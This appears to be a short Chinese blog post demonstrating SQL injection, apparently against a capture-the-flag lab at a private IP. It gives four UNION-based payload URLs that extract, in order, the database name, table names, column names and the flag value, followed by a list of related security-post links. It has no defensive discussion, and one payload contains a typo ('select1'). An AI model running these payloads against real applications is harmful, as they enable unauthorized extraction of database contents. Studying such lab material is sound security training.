网络安全sql注入实战演示

http://172.13.64.178:8080/user/userinfo?id=1 and 1=2 union select 1,2,(database())---库名

http://172.13.64.178:8080/user/userinfo?id=1 and 1=2 union select1,2,group_concat(table_name) from information_schema.tables where table_schema=database()---表名

http://172.13.64.178:8080/user/userinfo?id=1 and 1=2 union select 1,2,(group_concat(column_name)) from information_schema.columns where table_name="flag"---列名

http://172.13.64.178:8080/user/userinfo?id=1 and 1=2 union select 1,2,(select flag from flag)---值

相关推荐
Xudde.1 天前
班级作业笔记报告0x09
笔记·学习·安全·web安全·php
CHICX12291 天前
3.SQL 注入之高权限注入(上):从权限原理到跨库攻击,吃透 root 权限注入的危害与防御
web安全·网络安全
m0_738120721 天前
渗透基础知识ctfshow——Web应用安全与防护(第二章)
服务器·前端·安全·web安全·php
鹅天帝1 天前
20260407网安学习日志——序列化漏洞
前端·学习·web安全·网络安全·xss
爱思考的发菜_汽车网络信息安全1 天前
汽车网络安全:ECC算法详细解析
安全·web安全·汽车
运维行者_1 天前
MSP网络管理破局者:IPAM+SPM插件终结IP冲突与安全威胁
运维·服务器·开发语言·网络·安全·web安全·php
买大橘子也用券1 天前
第一届 Polaris CTF 招新赛(部分web) wp
web安全·网络安全
李豆豆喵1 天前
008-基础入门-不回显不出网&演示环境&源码项目等
web安全
不灭锦鲤2 天前
网络安全学习(面试)
学习·安全·web安全
不灭锦鲤2 天前
网络安全学习(面试题)
学习·安全·web安全